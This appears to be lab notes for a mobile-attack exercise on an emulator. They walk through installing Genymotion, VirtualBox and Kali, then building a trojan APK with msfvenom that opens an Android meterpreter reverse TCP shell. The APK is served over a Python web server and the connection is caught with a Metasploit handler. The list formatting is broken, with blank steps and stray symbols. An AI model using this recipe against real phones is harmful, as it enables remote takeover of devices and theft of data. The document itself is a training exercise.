Simulation
Setting up Testing Environment
1. Genymotion - Android Emulator
2. VMWare - Virtual Machine/VirtualBox
3. Kali Linux - OS
a. USB for Kali Linux
Installation
1. Install VirtualBox, leave configurations at default
1. Genymotion - installation is mostly just clicking next then restart machine
a. Make an account for first launch
b.
c. Usage - Personal Use
d. T&C then next
�e.
i. to create virtual device, + icon uptop
ii.
iii.
Once a unit is selected, you can customize settings. Preferably leave it as
default
1. device needs installation
f. Open VirtualBox, your device should be connected to it
i.
� 1. select device then click show
g. Open Genymotion and open device
i.
2. Installing Kali Linux in VirtualBox
a.
i. goto New
�b.
i. name VM
ii. set file location
iii. OS distrib and version will be set to Debian
iv. Next
c.
i. allocate resources (RAM and CPU usage)
1. once set go Next then Finish
d. if setup looks like this
�i.
1. we can directly go to specify virtual hardware (resources)
2. then virtual hard disk
3.
a. this part is where we allocate the disk partition (in this case
machine will be using 20gb of allotted memory, you can
increase if you laptop has enough disk space)
b. if you have an external drive/usb with enough disk space,
you can change the directory
� e.
f. Goto settings for extra initializations
g. Start and run
h. Install Kali through Graphical Interface and it’s mostly clicking next
i. you can refer here
3. Performing Attack
a. Open Kali
b. Open Terminal uptop or ctrl+alt+T
c. ‘ifconfig’ (take note of ip address)
d. creating the malicious apk
i. create a new folder and open terminal there
ii. type commands
1. sudo msvenom \
2. –platform android \ (<-double dashes before platform)
3. -a java \
4. -p android/meterpreter/reverse_tcp \
5. -o myapp.apk \
6. LHOST=ipaddress \
7. LPORT=4444 (for testing)
8. hit enter
9. once process completes type ‘ls’ to verify payload apk was
created
4. Executing Mobile Attack
a. Setup simple Python web server
� i. python3 -m http.server 80
1. makes current files accessible via web browser
b. open android virtual device, browser, and enter ip address
i. download app and install
c. setup listener on Kali
i. new terminal tab
1. ‘msfconsole’
a. ‘use exploit/multi/handler’
i. ‘set payload android/meterpreter/reverse_tcp’
ii. ‘show options’
1. LPORT should already be set to 4444
2. set LHOST by typing
a. ‘LHOST ipaddress’
b. ‘show options’ to verify
iii. ‘run’
1. handler will wait for device to connect
d. open the installed app, allow access to everything
i. monitor metasploit console for changes (meterpreter session)
1. type ‘sysinfo’
2. take note of device details
3. ‘getuid’ for user account
4. ‘help’ for all the possible commands to execute
a. feel free to use at least 5-10 commands
